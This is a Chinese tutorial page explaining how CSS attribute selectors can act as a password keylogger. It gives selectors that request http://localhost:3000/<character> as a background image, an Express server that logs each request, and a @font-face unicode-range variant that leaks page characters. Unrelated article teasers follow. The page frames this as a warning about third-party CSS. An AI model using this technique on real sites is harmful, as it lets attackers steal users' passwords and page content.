简单的CSS代码,甚至不符合图灵完备的语言,但是也能成为一些攻击者的工具,下面简单介绍一下如何使用CSS去记录用户的密码。但是这些CSS脚本会出现在第三方CSS库中,所以使用第三方CSS库也需要谨慎,确保代码安全。直接上代码解析:
input[type="password"][value$="0"] { background-image: url("http://localhost:3000/0"); } input[type="password"][value$="1"] { background-image: url("http://localhost:3000/1"); } input[type="password"][value$="2"] { background-image: url("http://localhost:3000/2"); }
以上是部分代码,我们来解析一下CSS代码
input[type="password"]
是css选择器,作用是选择密码输入框, [value$="0"]
表示匹配输入的值是以0结尾的。所以:
input[type="password"][value$="0"] { background-image: url("http://localhost:3000/0"); }
上面代码的意思就是如果你在密码框中输入0,就去请求http://localhost:3000/0接口,但是浏览器默认情况下是不会将用户输入的值存储在value属性中,但是有的框架会同步这些值,例如React。
所以只要使用了如下图的脚本就能去存储用户的输入数据信息。
我们再来看一下服务器端的代码:
const express = require("express"); const app = express(); app.get("/:key", (req, res) => { process.stdout.write(req.params.key); return res.sendStatus(400); }); app.listen(3000, () => console.log("启动,监听3000端口"));
使用express创建服务器,监听3000端口,只要请求http://localhost:3000/:key,就能输出key的值,就能在服务器上记录输入的值。所以只要在每输入一个值都匹配,然后通过 background-image 去请求一个已经准备好的接口,就能记录用户的输入。类似的方法记录用户的内容的CSS代码@font-face {
font-family: blah; src: url('http://localhost:3000/a') format('woff'); unicode-range: U+85; } html { font-family: blah, sans-serif; }
你使用的的css的简单的字体库,只要你的页面中包含a,就会去请求http://localhost:3000/a,这样就能知道你的页面中包含有a字符。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持脚本之家。
CSS3实现酷炫的3D旋转透视 3D动画效果现在越来越普及,已经被广泛的应用到了各个...
作者 / Krish Vitaldevara,Google Play 信任与安全产品管理总监 多年来,向数十...
一、作用 离线浏览 - 根据文件规则把资源缓存在本地,脱机依然能够访问资源,联...
打开软件,我们按快捷键ctrl+n,建立一个新的文件。 点击常用,选择布局。 点击...
Dreamweaver中如何使用Flash影片 1、首先需要我们准备的是一个Flash文件,其次最...
行高line-height实现单行文本垂直居中 以前一直认为单行文本垂直居中要将高度和...
背景 京东购物小程序作为京东小程序业务流量的主要入口,承载着许多的活动和页面...
最近在做项目时,发现CSS3中关于动画的技术,自己很少运用在项目中,平时一些列...
在讲CSS优先级之前,我们得要了解什么是CSS,CSS是用来做什么的。 首先,我们对C...
在ie下设置 css 样式 style="cursor:hand;" 可以正常显示 但是在firefox下就不行...